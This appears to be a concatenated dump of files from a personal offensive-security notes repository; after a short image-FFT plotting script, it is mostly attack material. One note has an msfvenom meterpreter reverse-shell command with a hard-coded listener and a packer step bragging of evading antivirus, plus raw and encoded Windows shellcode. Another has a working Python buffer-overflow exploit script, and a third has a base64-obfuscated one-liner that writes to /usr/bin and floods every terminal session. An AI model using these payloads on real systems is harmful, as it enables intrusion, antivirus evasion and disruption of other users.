'winter', 'winter_r'] 15 | 16 | def two_d_FFT(cmapMode): 17 | # Load the image in grayscale mode 18 | img = cv2.imread(path, cv2.IMREAD_GRAYSCALE) # 19 | # Compute the two-dimensional FFT. 20 | f = np.fft.fft2(img) 21 | # Swap half-spaces for all axes 22 | fshift = np.fft.fftshift(f) 23 | # Calculate the logarithm 24 | magnitude_spectrum = 20*np.log(np.abs(fshift)) 25 | plt.title(cmapMode) 26 | plt.imshow(magnitude_spectrum, cmap=cmapMode) 27 | 28 | plt.figure() 29 | plt.subplot(221) 30 | two_d_FFT('Accent') 31 | plt.subplot(222) 32 | two_d_FFT('rainbow') 33 | plt.subplot(223) 34 | two_d_FFT('binary') 35 | plt.subplot(224) 36 | two_d_FFT('Reds') 37 | 38 | # Display the result 39 | plt.show() 40 | -------------------------------------------------------------------------------- /docs/shellcode.md: -------------------------------------------------------------------------------- 1 | # Shellcode Notes 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | The following are my helpful short opcodes to open Command Prompt for testing against vulnerable apps. 6 | 7 | ### Reference 8 | 9 | * [1] 10 | 11 | ### Links 12 | 13 | * [Helpful Opcode Chemistry table](http://sparksandflames.com/files/x86InstructionChart.html) 14 | 15 | --- 16 | 17 | ## FUD packer by phra - PEzor 18 | 19 | ### Build venom payload to connect back to our shell 20 | 21 | * `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.150.114 LPORT=8081 -o /opt/lol64 --format raw` 22 | 23 | ### Run phra's packer 24 | 25 | * PEzor located here: 26 | * `bash PEzor/PEzor.sh -64 -sgn -text -syscalls -sleep=42 lol64` 27 | 28 | ### 1/70 detections on Virustotal 29 | 30 | Run the exe on our Win 10 target by any means. 31 | 32 | Boom, full meterpreter via multihandler! 33 | 34 | --- 35 | 36 | ## Raw shellcode 37 | 38 | ### Win32 - WinExec(A,B) w/ SW_HIDE 39 | 40 | ```asm 41 | 33c0 ; Clear out eAX 42 | 50 ; Use "0" for (B) of winexec if we just want the smallest shellcode 43 | ; "0" from eAX will be equivalent to SW_HIDE constant [1]. 44 | 68636d6400 ; Push "cmd" (A) 45 | 8bcc ; Mov ecx,esp 46 | 53 ; Push eBX (B) 47 | 51 ; Push eCX (A) 48 | b86ef47875 ; My location of winexec(A,B) in kernel32 DLL, ASLR will change this on every boot. 49 | ffd0 ; Call eAX (fire!) 50 | 51 | Full: 52 | \x33\xc0\x50\x68\x63\x6d\x64\x00\x8b\xcc\x53\x51\xb8\x6e 53 | \xf4\x78\x75\xff\xd0 54 | 55 | Null-free: 56 | \x33\xdb\xbb\x52\x5c\x53\xef\x81\xc3\x11\x11\x11\x11\x53 57 | \x8b\xdc\x33\xc0\x50\x53\xb8\x6e\xf4\x78\x75\xff\xd0 58 | 59 | SGN Encoded (single round): 60 | \xba\x20\x8e\xae\xc7\xd9\xe8\xd9\x74\x24\xf4\x5e\x2b\xc9 61 | \xb1\x05\x31\x56\x15\x83\xc6\x04\x03\x56\x11\xe2\xd5\xbd 62 | \x6e\x97\x7d\xa1\x03\x7c\x7d\xae\x10\x2f\x2c\x08\xc6\x24 63 | \xb6\x1d\xe8\x15 64 | ``` 65 | 66 | ### Win32 - ShellExecuteA w/ SW_SHOW 67 | 68 | #### Issue: may require vulnerable app to have shell32 DLL loaded, check with procexp 69 | 70 | ```asm 71 | 68636d6400 ; push "cmd" 72 | 8bdc ; Mov ebx, esp 73 | 6a00 ; Push nullbyte to end "open" string 74 | 686f70656e ; Push "open" 75 | 8bcc ; Mov ecx, esp 76 | 6a05 ; Push "5" for SW_SHOW constant [1]. 77 | 33c0 ; Xor eax with itself (0 it out) 78 | 50 ; Push eax (null, or "0") 79 | 50 ; Push eax 80 | 53 ; Push ebx 81 | 51 ; Push ecx 82 | 50 ; Push eax 83 | b8c0877a76 ; My location of ShellExecuteA(x,x,x,x,x,x) in shell32 DLL, ASLR will change this on every boot. 84 | ffd0 ; Call eax 85 | 86 | Full: 87 | \x68\x63\x6d\x64\x00\x8b\xdc\x6a\x00\x68\x6f\x70\x65\x6e\x8b\xcc\x6a\x05\x33\xc0\x50\x50\x53\x51\x50\xb8\xc0\x87\x7a\x76\xff\xd0 88 | ``` 89 | -------------------------------------------------------------------------------- /docs/exploit-win-py3-bof.md: -------------------------------------------------------------------------------- 1 | # Python 3 Argument based buffer overflow solution 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | The problem with Python3 is that all shell interaction (e.g. using subprocess or OS) will attempt implicit decode of bytes to latin or utf8. 6 | 7 | This breaks our shellcode that relies on being specific bytes. 8 | 9 | The solution I've settled on is supported from windows 7 and above and uses a hacky powershell workaround to send raw un-encoded bytes to the argument of a program. 10 | It does this by writing a binary file and using powershell to cat this out to the argument of the program. 11 | 12 | I know, I know, terrible. 13 | 14 | --- 15 | 16 | ## Code 17 | 18 | ```python3 19 | import os 20 | import sys 21 | from struct import pack 22 | import subprocess 23 | # Usage: 24 | # 25 | # >>> Findjmp ntdll.dll esp 26 | # Scanning ntdll.dll for code useable with the esp register 27 | # 0x776D57CE call esp 28 | # 0x77711C43 29 | # [.....] 30 | # Finished Scanning ntdll.dll for code useable with the esp register 31 | # Found 8 usable addresses... 32 | # 33 | # Put one of them into "function_location" 34 | # 35 | # >>> py -3 py3-terrible.py 36 | # Sends this to program argument 1 as an example (calc.exe shellcode) 37 | # 000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 | # 000010 41 41 41 41 41 41 3b 7d 26 90 90 90 90 90 90 90 39 | # 000020 90 31 db 64 8b 7b 30 8b 7f 0c 8b 7f 1c 8b 47 08 40 | # 000030 8b 77 20 8b 3f 80 7e 0c 33 75 f2 89 c7 03 78 3c 41 | # 000040 8b 57 78 01 c2 8b 7a 20 01 c7 89 dd 8b 34 af 01 42 | # 000050 c6 45 81 3e 43 72 65 61 75 f2 81 7e 08 6f 63 65 43 | # 000060 73 75 e9 8b 7a 24 01 c7 66 8b 2c 6f 8b 7a 1c 01 44 | # 000070 c7 8b 7c af fc 01 c7 89 d9 b1 ff 53 e2 fd 68 63 45 | # 000080 61 6c 63 89 e2 52 52 53 53 53 53 53 53 52 53 ff 46 | # 000090 d7 47 | 48 | 49 | # ------- OPTIONS -------- 50 | binary_name = b"sploitme.exe" 51 | padding_to_BOF = 22 # Junk -> EBP Overwritten 52 | # Enter the memory location you want to exec 53 | function_location = 0x773407A8 # use a kernel32 JMP ESP when using shellcode 54 | no_null_bytes = False # C library functions such as strcpy 55 | # will stop on \x00 and kill the exploit, 56 | # toggle to avoid this! 57 | nop_count = 0 58 | shellcode = b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7" 59 | 60 | # Open calc.exe generic all-win32: "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7" 61 | # ----------------------- 62 | 63 | def fast_byte_build(byte_to_use,count): 64 | ret = bytearray() 65 | for i in range(count): 66 | ret += byte_to_use 67 | i+=i 68 | return bytes(ret) 69 | 70 | payload = fast_byte_build(b'\x41',padding_to_BOF) 71 | payload += pack("0: 79 | nop_sled = fast_byte_build(b'\x90',nop_count) 80 | payload += nop_sled 81 | payload += shellcode 82 | # Python3 remedy for its implicit decoding of byte sequences in a shell 83 | f=open("buffersploit.txt","wb+") 84 | f.write(payload) 85 | f.close() 86 | 87 | # Fire the hack... literally and figuratively 88 | print("Executing: " + binary_name.decode('utf8'))) 89 | print("Payload" + str(payload)) 90 | 91 | command = [ 92 | "powershell.exe", 93 | "-c", 94 | "./" + binary_name.decode('utf8'), 95 | "$(cat buffersploit.txt)" 96 | ] 97 | subprocess.call(command, shell=True) 98 | ``` 99 | -------------------------------------------------------------------------------- /docs/king-of-the-hill.md: -------------------------------------------------------------------------------- 1 | # King of the hill 2 | 3 | ## [⬅ Back to Index](../README.md) 4 | 5 | --- 6 | 7 | ## Hostile environment!1! 8 | 9 | ### Infinite spam cowsay to all possible 10 sessions 10 | 11 | Better than /dev/urandom! 12 | 13 | This oneliner will unload cowsay script and use it to spam all tty sessions till the ... cows.. come home. 14 | 15 | *Perfect for keeping king, not so much for keeping friends!* 16 | 17 | * Uses perl script "Cowsay 3.03" located here: 18 | 19 | ```bash 20 | echo JHRoZV9jb3cgPSA8PCJFT0MiOwogICAgICAgICR0aG91Z2h0cyAgIF5fX14KICAgICAgICAgJHRob3VnaHRzICAoJGV5ZXMpXFxfX19fX19fCiAgICAgICAgICAgIChfXylcXCAgICAgICApXFwvXFwKICAgICAgICAgICAgICR0b25ndWUgfHwtLS0tdyB8CiAgICAgICAgICAgICAgICB8fCAgICAgfHwKRU9DCg==|base64 -d>/usr/bin/default.cow;echo IyVCQU5HUEVSTCUKCiMjCiMjIENvd3NheSAzLjAzCiMjCiMjIFRoaXMgZmlsZSBpcyBwYXJ0IG9mIGNvd3NheS4gIChjKSAxOTk5LTIwMDAgVG9ueSBNb25yb2UuCiMjCgp1c2UgVGV4dDo6VGFicyBxdyhleHBhbmQpOwp1c2UgVGV4dDo6V3JhcCBxdyh3cmFwIGZpbGwgJGNvbHVtbnMpOwp1c2UgRmlsZTo6QmFzZW5hbWU7CnVzZSBHZXRvcHQ6OlN0ZDsKdXNlIEN3ZDsKCiR2ZXJzaW9uID0gIjMuMDMiOwokcHJvZ25hbWUgPSBiYXNlbmFtZSgkMCk7CiRleWVzID0gIm9vIjsKJHRvbmd1ZSA9ICIgICI7CiRjb3dwYXRoID0gJEVOVnsnQ09XUEFUSCd9IHx8ICclUFJFRklYJS9zaGFyZS9jb3dzJzsKQG1lc3NhZ2UgPSAoKTsKJHRob3VnaHRzID0gIiI7CgojIyBZZWFoLCB0aGlzIGlzIHJ1ZGUsIEkga25vdy4gIEJ1dCBob3BlZnVsbHkgaXQgZ2V0cyBhcm91bmQgYSBuYXN0eQojIyBsaXR0bGUgdmVyc2lvbiBkZXBlbmRlbmN5LgoKJFRleHQ6OldyYXA6OmluaXRpYWxfdGFiID0gODsKJFRleHQ6OldyYXA6OnN1YnNlcXVlbnRfdGFiID0gODsKJFRleHQ6OldyYXA6OnRhYnN0b3AgPSA4OwoKIyMgT25lIG9mIHRoZXNlIGRheXMsIHdlJ2xsIGdldCBpdCBwb3J0ZWQgdG8gV2luZG93cy4gIFllYWgsIHJpZ2h0LgoKaWYgKCgkXk8gZXEgIk1TV2luMzIiKSBvciAoJF5PIGVxICJXaW5kb3dzX05UIikpIHsJIyMgTWFueSBwZXJscywgZWVrIQogICAgJHBhdGhzZXAgPSAnOyc7Cn0gZWxzZSB7CiAgICAkcGF0aHNlcCA9ICc6JzsKfQoKJW9wdHMgPSAoCiAgICAnZScJCT0+CSdvbycsCiAgICAnZicJCT0+CSdkZWZhdWx0LmNvdycsCiAgICAnbicJCT0+CTAsCiAgICAnVCcJCT0+CScgICcsCiAgICAnVycJCT0+CTQwLAopOwoKZ2V0b3B0cygnYmRlOmY6Z2hsTG5OcHN0VDp3Vzp5JywgXCVvcHRzKTsKCiZkaXNwbGF5X3VzYWdlIGlmICRvcHRzeydoJ307CiZsaXN0X2Nvd2ZpbGVzIGlmICRvcHRzeydsJ307CgokYm9yZyA9ICRvcHRzeydiJ307CiRkZWFkID0gJG9wdHN7J2QnfTsKJGdyZWVkeSA9ICRvcHRzeydnJ307CiRwYXJhbm9pZCA9ICRvcHRzeydwJ307CiRzdG9uZWQgPSAkb3B0c3sncyd9OwokdGlyZWQgPSAkb3B0c3sndCd9Owokd2lyZWQgPSAkb3B0c3sndyd9OwokeW91bmcgPSAkb3B0c3sneSd9OwokZXllcyA9IHN1YnN0cigkb3B0c3snZSd9LCAwLCAyKTsKJHRvbmd1ZSA9IHN1YnN0cigkb3B0c3snVCd9LCAwLCAyKTsKJHRoZV9jb3cgPSAiIjsKCiZzbHVycF9pbnB1dDsKJFRleHQ6OldyYXA6OmNvbHVtbnMgPSAkb3B0c3snVyd9OwpAbWVzc2FnZSA9ICgkb3B0c3snbid9ID8gZXhwYW5kKEBtZXNzYWdlKSA6IAoJICAgIHNwbGl0KCJcbiIsIGZpbGwoIiIsICIiLCBAbWVzc2FnZSkpKTsKJmNvbnN0cnVjdF9iYWxsb29uOwomY29uc3RydWN0X2ZhY2U7CiZnZXRfY293OwpwcmludCBAYmFsbG9vbl9saW5lczsKcHJpbnQgJHRoZV9jb3c7CgpzdWIgbGlzdF9jb3dmaWxlcyB7CiAgICBteSAkYmFzZWRpcjsKICAgIG15IEBkaXJmaWxlczsKICAgIGNob3AoJGJhc2VkaXIgPSBjd2QpOwogICAgZm9yIG15ICRkIChzcGxpdCgvJHBhdGhzZXAvLCAkY293cGF0aCkpIHsKCXByaW50ICJDb3cgZmlsZXMgaW4gJGQ6XG4iOwoJb3BlbmRpcihDT1dESVIsICRkKSB8fCBkaWUgIiQwOiBDYW5ub3Qgb3BlbiAkZFxuIjsKCWZvciBteSAkZmlsZSAocmVhZGRpciBDT1dESVIpIHsKCSAgICBpZiAoJGZpbGUgPX4gcy9cLmNvdyQvLykgewoJCXB1c2goQGRpcmZpbGVzLCAkZmlsZSk7CgkgICAgfQoJfQoJY2xvc2VkaXIoQ09XRElSKTsKCXByaW50IHdyYXAoIiIsICIiLCBzb3J0IEBkaXJmaWxlcyksICJcbiI7CglAZGlyZmlsZXMgPSAoKTsKCWNoZGlyKCRiYXNlZGlyKTsKICAgIH0KICAgIGV4aXQoMCk7Cn0KCnN1YiBzbHVycF9pbnB1dCB7CiAgICB1bmxlc3MgKCRBUkdWWzBdKSB7CgljaG9tcChAbWVzc2FnZSA9IDxTVERJTj4pOwogICAgfSBlbHNlIHsKCSZkaXNwbGF5X3VzYWdlIGlmICRvcHRzeyduJ307CglAbWVzc2FnZSA9IGpvaW4oJyAnLCBAQVJHVik7CiAgICB9Cn0KCnN1YiBtYXhsZW5ndGggewogICAgbXkgKCRsLCAkbSk7CiAgICAkbSA9IC0xOwogICAgZm9yIG15ICRpIChAXykgewoJJGwgPSBsZW5ndGggJGk7CgkkbSA9ICRsIGlmICgkbCA+ICRtKTsKICAgIH0KICAgIHJldHVybiAkbTsKfQoKc3ViIGNvbnN0cnVjdF9iYWxsb29uIHsKICAgIG15ICRtYXggPSAmbWF4bGVuZ3RoKEBtZXNzYWdlKTsKICAgIG15ICRtYXgyID0gJG1heCArIDI7CSMjIGJvcmRlciBzcGFjZSBmdWRnZS4KICAgIG15ICRmb3JtYXQgPSAiJXMgJS0ke21heH1zICVzXG4iOwogICAgbXkgQGJvcmRlcjsJIyMgdXAtbGVmdCwgdXAtcmlnaHQsIGRvd24tbGVmdCwgZG93bi1yaWdodCwgbGVmdCwgcmlnaHQKICAgIGlmICgkMCA9fiAvdGhpbmsvaSkgewoJJHRob3VnaHRzID0gJ28nOwoJQGJvcmRlciA9IHF3WyAoICkgKCApICggKSBdOwogICAgfSBlbHNpZiAoQG1lc3NhZ2UgPCAyKSB7CgkkdGhvdWdodHMgPSAnXFwnOwoJQGJvcmRlciA9IHF3WyA8ID4gXTsKICAgIH0gZWxzZSB7CgkkdGhvdWdodHMgPSAnXFwnOwoJaWYgKCRWIGFuZCAkViBndCB2NS42LjApIHsJCSMgVGhhbmtzLCBwZXJsZGVsdGEuCgkgICAgQGJvcmRlciA9IHF3WyAvIFxcIFxcIC8gfCB8IF07Cgl9IGVsc2UgewoJICAgIEBib3JkZXIgPSBxd1sgLyBcIFwgLyB8IHwgXTsJCgl9CiAgICB9CiAgICBwdXNoKEBiYWxsb29uX2xpbmVzLCAKCSIgIiAuICgiXyIgeCAkbWF4MikgLiAiIFxuIiAsCglzcHJpbnRmKCRmb3JtYXQsICRib3JkZXJbMF0sICRtZXNzYWdlWzBdLCAkYm9yZGVyWzFdKSwKCShAbWVzc2FnZSA8IDIgPyAiIiA6IAoJICAgIG1hcCB7IHNwcmludGYoJGZvcm1hdCwgJGJvcmRlcls0XSwgJF8sICRib3JkZXJbNV0pIH0gCgkJQG1lc3NhZ2VbMSAuLiAkI21lc3NhZ2UgLSAxXSksCgkoQG1lc3NhZ2UgPCAyID8gIiIgOiAKCSAgICBzcHJpbnRmKCRmb3JtYXQsICRib3JkZXJbMl0sICRtZXNzYWdlWyQjbWVzc2FnZV0sICRib3JkZXJbM10pKSwKICAgICAgICAiICIgLiAoIi0iIHggJG1heDIpIC4gIiBcbiIKICAgICk7Cn0KCnN1YiBjb25zdHJ1Y3RfZmFjZSB7CiAgICBpZiAoJGJvcmcpIHsgJGV5ZXMgPSAiPT0iOyB9CiAgICBpZiAoJGRlYWQpIHsgJGV5ZXMgPSAieHgiOyAkdG9uZ3VlID0gIlUgIjsgfQogICAgaWYgKCRncmVlZHkpIHsgJGV5ZXMgPSAiXCRcJCI7IH0KICAgIGlmICgkcGFyYW5vaWQpIHsgJGV5ZXMgPSAiQEAiOyB9CiAgICBpZiAoJHN0b25lZCkgeyAkZXllcyA9ICIqKiI7ICR0b25ndWUgPSAiVSAiOyB9CiAgICBpZiAoJHRpcmVkKSB7ICRleWVzID0gIi0tIjsgfSAKICAgIGlmICgkd2lyZWQpIHsgJGV5ZXMgPSAiT08iOyB9IAogICAgaWYgKCR5b3VuZykgeyAkZXllcyA9ICIuLiI7IH0KfQoKc3ViIGdldF9jb3cgewojIwojIyBHZXQgYSBjb3cgZnJvbSB0aGUgc3BlY2lmaWVkIGNvd2ZpbGU7IG90aGVyd2lzZSB1c2UgdGhlIGRlZmF1bHQgY293CiMjIHdoaWNoIHdhcyBkZWZpbmVkIGFib3ZlIGluICR0aGVfY293LgojIwogICAgbXkgJGYgPSAkb3B0c3snZid9OwogICAgbXkgJGZ1bGwgPSAiIjsKICAgIGlmICgkb3B0c3snZid9ID1+IG0sLywpIHsKCSRmdWxsID0gJG9wdHN7J2YnfTsKICAgIH0gZWxzZSB7Cglmb3IgbXkgJGQgKHNwbGl0KC86LywgJGNvd3BhdGgpKSB7CgkgICAgaWYgKC1mICIkZC8kZiIpIHsKCQkkZnVsbCA9ICIkZC8kZiI7CgkJbGFzdDsKCSAgICB9IGVsc2lmICgtZiAiJGQvJGYuY293IikgewoJCSRmdWxsID0gIiRkLyRmLmNvdyI7CgkJbGFzdDsKCSAgICB9Cgl9CglpZiAoJGZ1bGwgZXEgIiIpIHsKCSAgICBkaWUgIiRwcm9nbmFtZTogQ291bGQgbm90IGZpbmQgJGYgY293ZmlsZSFcbiI7Cgl9CiAgICB9CiAgICBkbyAkZnVsbDsKICAgIGRpZSAiJHByb2duYW1lOiAkQFxuIiBpZiAkQDsKfQoKc3ViIGRpc3BsYXlfdXNhZ2UgewoJZGllIDw8RU9GOwpjb3d7c2F5LHRoaW5rfSB2ZXJzaW9uICR2ZXJzaW9uLCAoYykgMTk5OSBUb255IE1vbnJvZQpVc2FnZTogJHByb2duYW1lIFstYmRncHN0d3ldIFstaF0gWy1lIGV5ZXNdIFstZiBjb3dmaWxlXSAKICAgICAgICAgIFstbF0gWy1uXSBbLVQgdG9uZ3VlXSBbLVcgd3JhcGNvbHVtbl0gW21lc3NhZ2VdCkVPRgp9Cg==|base64 -d>/usr/bin/cowsay.pl;for i in $(seq 0 10);do while [ 1 ];do perl /usr/bin/cowsay.pl -f /usr/bin/default.cow deeznuts > /dev/pts/$i &done &done 21 | ``` 22 | --------------------------------------------------------------------------------